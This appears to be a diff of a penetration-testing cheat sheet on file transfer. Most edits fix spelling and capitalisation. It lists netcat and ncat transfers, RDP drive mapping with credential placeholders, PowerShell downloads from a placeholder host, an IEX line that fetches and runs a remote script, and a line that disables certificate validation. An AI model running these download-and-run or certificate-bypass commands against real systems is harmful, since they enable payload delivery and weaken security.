Connecting to an SMB share using PowerShell¶

 nc -l -p 8000 > received_file.exe

-- Using Netcat
+- Using netcat

-nc -q 0 [IP_ADRESS] 8000 < file.exe
+nc -q 0 [IP-ADDRESS] 8000 < file.exe

-- Using Ncat
+- Using ncat

-ncat --send-only [IP_ADRESS] 8000 < file.exe
+ncat --send-only [IP-ADDRESS] 8000 < file.exe

-- Using Netcat
+- Using netcat

-- Using rdesktop for File Transfer
+- Using rdesktop for file transfer

-rdesktop [IP-ADRESS] -d [DOMAIN] -u [USERNAME] -p '[PASSWORD]' -r disk:linux='/home/user/rdesktop/files'
+rdesktop [IP-ADDRESS] -d [DOMAIN] -u [USERNAME] -p '[PASSWORD]' -r disk:linux='/home/user/rdesktop/files'

-- Using xfreerdp for File Transfer
+- Using xfreerdp for file transfer

-xfreerdp /v:[IP-ADRESS] /d:[DOMAIN] /u:[USERNAME] /p:'[PASSWORD]' /drive:[NAME],[PATH]
+xfreerdp /v:[IP-ADDRESS] /d:[DOMAIN] /u:[USERNAME] /p:'[PASSWORD]' /drive:[NAME],[PATH]

 Connect to\\tsclient\

-within the RDP session to transfer files to and from the mounted directory.
+within the RDP session to transfer files.

-(New-Object Net.WebClient).DownloadFile('http://[IP-ADRESS]:8000/file.ps1','C:\Temp\file.ps1')
+(New-Object Net.WebClient).DownloadFile('http://[IP-ADDRESS]:8000/file.ps1','C:\Temp\file.ps1')

-(New-Object Net.WebClient).DownloadFileAsync('http://[IP-ADRESS]:8000/file.ps1', 'C:\Temp\file.ps1')
+(New-Object Net.WebClient).DownloadFileAsync('http://[IP-ADDRESS]:8000/file.ps1', 'C:\Temp\file.ps1')

-IEX (New-Object Net.WebClient).DownloadString('http://[IP-ADRESS]:8000/file.ps1')
+IEX (New-Object Net.WebClient).DownloadString('http://[IP-ADDRESS]:8000/file.ps1')

-Invoke-WebRequest http://[IP-ADRESS]:8000/file.ps1 -OutFile C:\Temp\file.ps1
+Invoke-WebRequest http://[IP-ADDRESS]:8000/file.ps1 -OutFile C:\Temp\file.ps1

-Invoke-WebRequest http://[IP-ADRESS]:8000/file.ps1 -UseBasicParsing
+Invoke-WebRequest http://[IP-ADDRESS]:8000/file.ps1 -UseBasicParsing

 [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}